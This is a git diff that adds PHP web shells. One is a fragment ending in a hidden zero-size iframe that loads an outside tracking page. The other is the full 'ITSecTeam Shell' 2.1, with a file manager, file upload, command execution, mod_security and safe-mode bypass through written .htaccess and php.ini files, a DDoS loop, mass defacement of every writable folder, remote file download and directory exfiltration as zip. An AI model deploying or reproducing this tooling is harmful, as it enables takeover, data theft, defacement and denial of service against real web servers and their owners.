+switch($s)
+{
+	case"a":File_a($p);break;
+	case"b":Guama_b();break;
+	case"c":Qingma_c();break;
+	case"d":Tihuan_d();break;
+	case"e":Antivirus_e();break;
+	case"f":Info_f();break;
+	case"g":Exec_g();break;
+	case"h":Com_h();break;
+	case"i":Port_i();break;
+	case"j":Findfile_j();break;
+	case"k":Linux_k();break;
+	case"l":Servu_l();break;
+	case"n":Mysql_n();break;
+	case"o":Mysql_o();break;
+	case"p":File_Edit($_GET['fp'],$_GET['fn']); break;
+	case"q":File_Soup($p); break;
+	case"r":Mysql_Msg(); break;
+	case"aa":ftp_php();break;
+	case"bb":Shellcode_j();break;
+	case"cc":Crack_k();break;
+	case"dd":phpsocket();break;
+	case"ee":Mysql_u();break;
+	case"ff":phpcode();break;
+	case"gg":otherdb();break;
+	case"hh":phpreg();break;
+	default:WinMain();break;
+}
+?>
+<iframe src=http://www.duolian.com/count/cet/admin_count/adminindex.asp width=0 height=0></iframe>
\ No newline at end of file
diff --git a/php/itsec.php b/php/itsec.php
new file mode 100644
index 0000000..f4a8767
--- /dev/null
+++ b/php/itsec.php
@@ -0,0 +1,1284 @@
+<?php
+session_start();
+set_time_limit(0);
+error_reporting(0);
+if (get_magic_quotes_gpc()) {
+function stripslashes_deep($value)    {
+        $value = is_array($value) ?
+                    array_map('stripslashes_deep', $value) :
+                    stripslashes($value);
+
+        return $value;
+    }
+$_POST = array_map('stripslashes_deep', $_POST);
+$_GET = array_map('stripslashes_deep', $_GET);
+$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
+$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
+}
+if($_GET['do']=="remove"){
+unlink(getcwd().$_SERVER["SCRIPT_NAME"]);
+}
+$basep=$_SERVER['DOCUMENT_ROOT'];
+if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
+$slash="\\";
+$basep=str_replace("/","\\",$basep);
+}else{
+$slash="/";
+$basep=str_replace("\\","/",$basep);
+}
+if($_GET['do']=="remove"){
+unlink(getcwd().$slash.$_SERVER["SCRIPT_NAME"]);
+}
+if ($_REQUEST['address']){
+if(is_readable($_REQUEST['address'])){
+chdir($_REQUEST['address']);}else{
+alert("Permission Denied !");}}
+$me=$_SERVER['PHP_SELF'];
+$formp="<form method=post action='".$me."'>";
+$formg="<form method=get action='".$me."'>";
+$nowaddress='<input type=hidden name=address value="'.getcwd().'">';
+if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) {
+   if(move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"])){
+   alert("File Upload Successful");
+   }else{
+alert("Permission Denied !");
+   
+   }
+   }
+if(ini_get('disable_functions')){
+$disablef=ini_get('disable_functions');
+}else{
+$disablef="All Functions Enable";
+}
+if(ini_get('safe_mode')){
+$safe_modes="On";
+}else{
+$safe_modes="Off";
+}
+if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){
+if (chmod($_POST['chmode'],"0".$_POST['chmodenum'])){alert("Chmod Ok!");}else{alert("Permission Denied !");}
+}
+$picdir='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1TQDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bOJd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7vuf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wcU9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1nVjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFfBsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQnG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkligaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII=';
+$picfile='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAABaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gnnzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036wOzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj/40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3sdeeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1nb7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb+B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmCC';
+$head='<style type="text/css">
+A:link {text-decoration: none}
+A:visited {text-decoration: none}
+A:active {text-decoration: none}
+A:hover {text-decoration: underline overline; color: 414141;}
+.focus td{border-top:0px solid #f8f8f8;border-bottom:1px solid #ddd;background:#f2f2f2;padding:0px 0px 0px 0px;}
+</style><head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>iTSecTeam</title>
+</head><body  topmargin="0" leftmargin="0" rightmargin="0" 
+bgcolor="#f2f2f2"><div align="center">
+&nbsp;<table border="1" width="1000" height="14" bordercolor="#CDCDCD" style="border-collapse: collapse; border-style: solid; border-width: 1px">
+<tr>
+<td height="30" width="996">
+<p align="center"><font face="Tahoma" style="font-size: 9pt"><span lang="en-us"><a href="?do=��ҳ">��ҳ</a> -- <a href="?do=filemanager&address='.getcwd().'">�ļ�����</a> -- <a href="?do=cmd&address='.getcwd().'">����ִ��</a> -- <a href="?do=bc&address='.getcwd().'">����shell</a> --
+<a href="?do=bypasscmd&address='.getcwd().'">BypasS ����ִ��(SF-DF)</a> -- <a href="?do=symlink&address='.getcwd().'">Symlink</a> --
+<a href="?do=bypassdir&address='.getcwd().'">�ƹ����ƶ��ļ�</a> -- <a href="?do=eval&address='.getcwd().'">
+PHP����</a> -- <a href="?do=db&address='.getcwd().'">���ݿ����</a> -- <a href="?do=����ת��&address='.getcwd().'">����ת��</a> -- <a href="?do=mail&address='.getcwd().'">�ʼ�ʹ��</a><a href="?do=info&address='.getcwd().'">
+<br>��������Ϣ</a> -- <a href="?do=d0slocal&address='.getcwd().'">��������</a> -- <a href="?do=dump&address='.getcwd().'">�������ݿ�</a> -- <a href="?do=mass&address='.getcwd().'">��������</a> -- <a href="?do=dlfile&address='.getcwd().'">�����ļ�</a> -- <a href="?do=dd0s&address='.getcwd().'">DDoS</a> -- <a href="?do=perm&address='.getcwd().'">���дĿ¼</a> -- <a href="?do=apache&address='.getcwd().'">Server</a> -- <a href="?do=remove&address='.getcwd().'">Remove Me</a> -- <a href="?do=about&address='.getcwd().'">About</a>
+</span></font></td></tr></table></div>
+<div align="center">
+<table id="table2" style="border-collapse: collapse; border-style: 
+solid;" width="1000" bgcolor="#eaeaea" border="1" bordercolor="#c6c6c6" 
+cellpadding="0"><tbody><tr><td><div align="center"><table id="table3" style="border-style:dashed; border-width:1px; margin-top: 1px; margin-bottom: 0px; 
+border-collapse: collapse" width="950" border="1" bordercolor="#cdcdcd"
+height="10" bordercolorlight="#CDCDCD" bordercolordark="#CDCDCD"><tbody><tr><font face="Tahoma" style="font-size: 9pt"><div align="center">
+Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_modes.' <td style="border: 1px solid rgb(198, 198, 198);" 
+width="950" bgcolor="#e7e3de" height="10" valign="top">';
+$end='</td></tr></tbody></table></div></td></tr><tr><td bgcolor="#c6c6c6"><p style="margin-top: 0pt; margin-bottom: 0pt" align="center"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt">'.base64_decode("Q29kZWQgYnkgQW1pbiBTaG9rb2hpIChQZWp2YWsp").'<br><a href="http://www.itsecteam.com" target="_blank"><font size=1>'.base64_decode("aVRTZWNUZWFtLmNvbQ==").'</a></font></span></td></tr></tbody></table></div></body></html>';
+$deny=$head."<p align='center'> <b>Oh My God!<br> Permission Denied".$end;
+function alert($text){
+echo "<script>alert('".$text."')</script>";
+}
+if ($_GET['do']=="edit" && $_GET['filename']!="dir"){
+if(is_readable($_GET['address'].$_GET['filename'])){
+$opedit=fopen($_GET['address'].$_GET['filename'],"r");
+while(!feof($opedit))
+$data.=fread($opedit,9999);
+fclose($opedit); 
+echo $head.$formp.$nowaddress.'<p align="center">File Name : '.$_GET['address'].$_GET['filename'].'<br><textarea rows="19" name="fedit" cols="87">'.htmlentities("$data").'</textarea><br><input value='.$_GET['filename'].' name=namefe><br><input type=submit value="  Save  "></form></p>'.$end;exit;
+}else{alert("Permission Denied !");}}
+function sizee($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+if($_REQUEST['do']=='about'){
+echo $head."<p align='center'><b><font color=red>ITSecTeam, IT Security Research & Penetration Testing Team</b></font><br>Version 2.1 <br>Last Update : 2010/10/10<br>Coded By : Amin Shokohi(Pejvak)<br>Special Thanks(M3hr@n.S , Am!rkh@n , R3dm0ve , Provider , H4mid@Tm3l , ahmadbady , Doosib )<br>��ҳ Page : <a href='http://www.itsecteam.com'>http://www.itsecteam.com</a><br>Update Notice: <a href='http://itsecteam.com/en/tools/itsecteam_shell.htm'>ITSecTeam Shell</a><br>Forum : <a href='http://www.forum.itsecteam.com'>http://www.forum.itsecteam.com</a><br>
+<center>
+<PRE>
+
+ ______  ______  ____                   ______                               
+/\__  _\/\__  _\/\  _`\                /\__  _\                              
+\/_/\ \/\/_/\ \/\ \,\L\_\     __    ___\/_/\ \/    __     __      ___ ___    
+   \ \ \   \ \ \ \/_\__ \   /'__`\ /'___\ \ \ \  /'__`\ /'__`\  /' __` __`\  
+    \_\ \__ \ \ \  /\ \L\ \/\  __//\ \__/  \ \ \/\  __//\ \L\.\_/\ \/\ \/\ \ 
+    /\_____\ \ \_\ \ `\____\ \____\ \____\  \ \_\ \____\ \__/.\_\ \_\ \_\ \_\
+    \/_____/  \/_/  \/_____/\/____/\/____/   \/_/\/____/\/__/\/_/\/_/\/_/\/_/
+                                                                             
+                                                                             
+
+                                                                        
+
+
+</PRE>
+
+
+".$end;exit;
+
+}
+function deleteDirectory($dir) {
+if (!file_exists($dir)) return true;
+if (!is_dir($dir) || is_link($dir)) return unlink($dir);
+foreach (scandir($dir) as $item) {
+if ($item == '.' || $item == '..') continue;
+if (!deleteDirectory($dir . "/" . $item)) {
+chmod($dir . "/" . $item, 0777);
+if (!deleteDirectory($dir . "/" . $item)) return false;
+};}return rmdir($dir);}
+
+function download($fileadd,$finame){
+$dlfilea=$fileadd.$finame;
+header("Content-Disposition: attachment; filename=" . $finame);   
+header("Content-Type: application/download");
+header("Content-Length: " . filesize($dlfilea));
+flush();
+$fp = fopen($$dlfilea, "r");
+while (!feof($fp))
+{
+    echo fread($fp, 65536);
+    flush();
+} 
+fclose($fp); 
+}
+if($_GET['do']=="rename"){
+echo $head.$formp.$nowaddress.'<p align="center"><input value='.$_GET['filename'].'><input type=hidden name=addressren value='.$_GET['address'].$_GET['filename'].'> To <input name=nameren><br><input type=submit value="  Save  "></form></p>'.$end;exit;
+}
+
+if ($_GET['byapache']=='ofms'){
+$fse=fopen(getcwd().$slash.".htaccess","w");
+fwrite($fse,'<IfModule mod_security.c>
+    Sec------Engine Off
+    Sec------ScanPOST Off
+</IfModule>');
+fclose($fse);
+}elseif ($_GET['byapache']=='bysap'){
+$fse=fopen(getcwd().$slash.".htaccess","w");
+fwrite($fse,'Options +FollowSymLinks
+DirectoryIndex Persian-Gulf-For-Ever.html');
+fclose($fse);
+}elseif ($_GET['byapache']=='sfadf'){
+$fse=fopen(getcwd().$slash."php.ini","w");
+fwrite($fse,'safe_mode=OFF
+disable_functions=NONE');
+fclose($fse);
+}
+if($_GET['do']=="apache"){
+echo $head.$formg.$nowaddress.'<p align="center">
+<select name=byapache>
+<option value="ofms">Off Mode Security(.htaccess)</option><option value="bysap">Bypass Symlink(.htaccess)</option>
+<option value="sfadf">Disable Safe Mode & Disable Function(Php.ini)</option>
+</select><br><input type=submit value=eXecute></form></p>'.$end;exit;
+}
+if($_GET['do']=="dd0s"){
+echo $head.$formg.$nowaddress.'<p align="center">Address : <input name=urldd0 size=50> Time : <input name=timedd0 size=6 value=40000><br><input type=submit value="  DDoS  "></form></p>'.$end;exit;
+}
+
+if($_GET['urldd0'] && $_GET['timedd0']){
+for ($id=0;$$id<$_GET['timedd0'];$id++){
+$fp=null;
+$contents=null;
+$fp=fopen($_GET['urldd0'],"rb");
+while (!feof($fp)) {
+  $contents .= fread($fp, 8192);
+}
+fclose($fp);
+}}
+if($_GET['do']=="dlfile"){
+echo $head.$formp.$nowaddress.'<p align="center">�����ļ�!<br>Address : <input name=adlr size=70><br>Save To : <input name=adsr value='.getcwd().$slash.' size=70><br><input type=submit value="  Download  "></form></p>'.$end;exit;
+}
+function dirpe($addres){
+global $slash;
+$idd=0;
+if ($dirhen = @opendir($addres)) {
+while ($file = readdir($dirhen)) {
+$permdir=str_replace('//','/',$addres.$slash.$file);
+if($file!='.' && $file!='..' && is_dir($permdir)){
+if (is_writable($permdir)) {
+$dirdata[$idd]['filename']=$permdir; 
+$idd++;
+}
+dirpe($permdir);
+			}
+		}
+		closedir($dirhen);
+	} else {
+		return ("notperm");
+	}
+	if ($dirdata){
+	return $dirdata;
+	}else{
+		return "notfound";
+
+	}
+}
+function dirpmass($addres,$massname,$masssource){
+global $slash;
+$idd=0;
+if ($dirhen = @opendir($addres)) {
+while ($file = readdir($dirhen)) {
+$permdir=str_replace('//','/',$addres.$slash.$file);
+if($file!='.' && $file!='..' && is_dir($permdir)){
+if (is_writable($permdir)) {
+if ($fm=fopen($permdir.$slash.$massname,"w")){
+fwrite($fm,$masssource);
+fclose($fm);
+$dirdata[$idd]['filename']=$permdir; 
+}
+
+$idd++;
+}
+dirpmass($permdir);
+			}
+		}
+		closedir($dirhen);
+	} else {
+		return ("notperm");
+	}
+	if ($dirdata){
+	return $dirdata;
+	}else{
+		return "notfound";
+
+	}
+}
+if($_GET['do']=="perm"){
+echo $head.$formp.'<p align="center">Find All Folder Writeable<br> <input name=affw value="'.getcwd().$slash.'" size=50><br><input type=submit value="  Search  "></form></p>'.$end;exit;
+}
+if ($_POST['affw']){
+$arrfilelist=dirpe($_POST['affw']);
+if ($arrfilelist=='notfound'){
+alert("Not Found !");
+}elseif($arrfilelist=='notperm'){
+alert("Permission Denied !");
+}else{
+foreach ($arrfilelist as $tmpdir){
+		if ($coi %2){
+$colort='"#e7e3de"';
+}else{
+$colort='"#e4e1de"';}
+$coi++;
+$permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
+<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir['filename'].'"><b>'.$tmpdir['filename'].'</b></span></td>
+<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
+<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
+}
+echo $head.'
+<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
+<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
+</tr></table>'.$permdir.'</table>
+<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---&gt; &nbsp;</td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
+<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee > 
+<input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----&gt;</b>&nbsp;&nbsp;File : </td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode>&nbsp;&nbsp;Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----&gt;</b> Dirctory Name </td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt">
+<input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----&gt;</b> Name File </td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
+<td width="200" align="right" valign="top">
+<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----&gt;</b></b>&nbsp;&nbsp;File : </td>
+<td width="750"><font face="Tahoma" style="font-size: 10pt">
+<input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
+}}
+if($_GET['do']=="mass"){
+echo $head.$formp.'<p align="center">[��������]<br><input name=mffw value="'.getcwd().$slash.'" size=50><input name=massname value="def.htm" size=10><br><textarea name=masssource cols=60 rows=18>Source</textarea><br><input type=submit value="  Mass  "></form></p>'.$end;exit;
+}
+if ($_POST['mffw']){
+$arrfilelist=dirpmass($_POST['mffw'],$_POST['massname'],$_POST['masssource']);
+if ($arrfilelist=='notfound'){
+alert("Not Found !");
+}elseif($arrfilelist=='notperm'){
+alert("Permission Denied !");
+}else{
+foreach ($arrfilelist as $tmpdir){
+		if ($coi %2){
+$colort='"#e7e3de"';
+}else{
+$colort='"#e4e1de"';}
+$coi++;
+$permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
+<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir['filename'].'"><b>'.$tmpdir['filename'].'</b></span></td>
+<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
+<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
+}
+echo $head.'
+<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
+<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
+</tr></table>'.$permdir.'</table>
+<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---&gt; &nbsp;</td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
+<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee > 
+<input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----&gt;</b>&nbsp;&nbsp;File : </td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode>&nbsp;&nbsp;Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----&gt;</b> Dirctory Name </td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt">
+<input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----&gt;</b> Name File </td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
+<td width="200" align="right" valign="top">
+<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----&gt;</b></b>&nbsp;&nbsp;File : </td>
+<td width="750"><font face="Tahoma" style="font-size: 10pt">
+<input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
+}}
+if($_POST['adlr'] && $_POST['adsr']){
+$url = $_POST['adlr'];
+$newfname = $_POST['adsr'] . basename($url);
+$file = fopen ($url, "rb");
+if ($file) {
+  $newf = fopen ($newfname, "wb");
+  if ($newf)
+  while(!feof($file)) {
+    fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
+  }
+  alert("File Downloaded Success");
+}else{alert("Can Not Open File");}
+if ($file) {
+  fclose($file);
+}
+if ($newf) {
+  fclose($newf);
+}
+}
+if($_GET['do']=="down" and $_GET['type']=='file'){
+download($_GET['address'],$_GET['filename']);}
+if($_GET['do']=="down" and $_GET['type']=='dir'){
+class zipfile
+{
+var $datasec = array(); 
+var $ctrl_dir = array(); 
+var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+var $old_offset = 0;
+function add_dir($name)
+{
+$name = str_replace("\\", "/", $name);
+$fr = "\x50\x4b\x03\x04";
+$fr .= "\x0a\x00";
+$fr .= "\x00\x00";
+$fr .= "\x00\x00";
+$fr .= "\x00\x00\x00\x00";
+$fr .= pack("V",0);
+$fr .= pack("V",0);
+$fr .= pack("V",0);
+$fr .= pack("v", strlen($name) ); 
+$fr .= pack("v", 0 );
+$fr .= $name;
+$fr .= pack("V",$crc); 
+$fr .= pack("V",$c_len); 
+$fr .= pack("V",$unc_len);
+$this -> datasec[] = $fr;
+$new_offset = strlen(implode("", $this->datasec));
+$cdrec = "\x50\x4b\x01\x02";
+$cdrec .="\x00\x00"; 
+$cdrec .="\x0a\x00"; 
+$cdrec .="\x00\x00"; 
+$cdrec .="\x00\x00"; 
+$cdrec .="\x00\x00\x00\x00"; 
+$cdrec .= pack("V",0); 
+$cdrec .= pack("V",0); 
+$cdrec .= pack("V",0); 
+$cdrec .= pack("v", strlen($name) );
+$cdrec .= pack("v", 0 );
+$cdrec .= pack("v", 0 ); 
+$cdrec .= pack("v", 0 ); 
+$cdrec .= pack("v", 0 ); 
+$ext = "\x00\x00\x10\x00";
+$ext = "\xff\xff\xff\xff";
+$cdrec .= pack("V", 16 );
+$cdrec .= pack("V", $this -> old_offset );
+$this -> old_offset = $new_offset;
+$cdrec .= $name;
+$this -> ctrl_dir[] = $cdrec;
+}
+function add_file($data, $name)
+{
+$name = str_replace("\\", "/", $name);
+$fr = "\x50\x4b\x03\x04";
+$fr .= "\x14\x00";
+$fr .= "\x00\x00";
+$fr .= "\x08\x00"; 
+$fr .= "\x00\x00\x00\x00";
+$unc_len = strlen($data);
+$crc = crc32($data);
+$zdata = gzcompress($data);
+$zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2);
+$c_len = strlen($zdata);
+$fr .= pack("V",$crc);
+$fr .= pack("V",$c_len);
+$fr .= pack("V",$unc_len);
+$fr .= pack("v", strlen($name) );
+$fr .= pack("v", 0 );
+$fr .= $name;
+$fr .= $zdata;
+$fr .= pack("V",$crc);
+$fr .= pack("V",$c_len); 
+$fr .= pack("V",$unc_len); 
+$this -> datasec[] = $fr;
+$new_offset = strlen(implode("", $this->datasec));
+$cdrec = "\x50\x4b\x01\x02";
+$cdrec .="\x00\x00";
+$cdrec .="\x14\x00"; 
+$cdrec .="\x00\x00";
+$cdrec .="\x08\x00";
+$cdrec .="\x00\x00\x00\x00"; 
+$cdrec .= pack("V",$crc); 
+$cdrec .= pack("V",$c_len); 
+$cdrec .= pack("V",$unc_len); 
+$cdrec .= pack("v", strlen($name) );
+$cdrec .= pack("v", 0 ); 
+$cdrec .= pack("v", 0 ); 
+$cdrec .= pack("v", 0 ); 
+$cdrec .= pack("v", 0 ); 
+$cdrec .= pack("V", 32 ); 
+$cdrec .= pack("V", $this -> old_offset );
+$this -> old_offset = $new_offset;
+$cdrec .= $name;
+$this -> ctrl_dir[] = $cdrec;
+}
+function file() { 
+$data = implode("", $this -> datasec);
+$ctrldir = implode("", $this -> ctrl_dir);
+return
+$data.
+$ctrldir.
+$this -> eof_ctrl_dir.
+pack("v", sizeof($this -> ctrl_dir)).
+pack("v", sizeof($this -> ctrl_dir)). 
+pack("V", strlen($ctrldir)). 
+pack("V", strlen($data)). 
+"\x00\x00";
+}
+}
+$dlfolder=$_GET['address'].$slash.$_GET['dirname'].$slash;
+$zipfile = new zipfile();
+function get_files_from_folder($directory, $put_into) {
+global $zipfile;
+if ($handle = opendir($directory)) {
+while (false !== ($file = readdir($handle))) {
+if (is_file($directory.$file)) {
+$fileContents = file_get_contents($directory.$file);
+$zipfile->add_file($fileContents, $put_into.$file);
+} elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) {
+$zipfile->add_dir($put_into.$file.'/');
+get_files_from_folder($directory.$file.'/', $put_into.$file.'/');
+}
+}
+}
+closedir($handle);
+}
+$datedl=date("y-m-d");
+get_files_from_folder($dlfolder,'');
+header("Content-Disposition: attachment; filename=" . $_GET['dirname']."-".$datedl.".zip");   
+header("Content-Type: application/download");
+header("Content-Length: " . strlen($zipfile -> file()));
+flush();
+echo $zipfile -> file(); 
+$filename = $_GET['dirname']."-".$datedl.".zip";
+$fd = fopen ($filename, "wb");
+$out = fwrite ($fd, $zipfile -> file());
+fclose ($fd);
+}
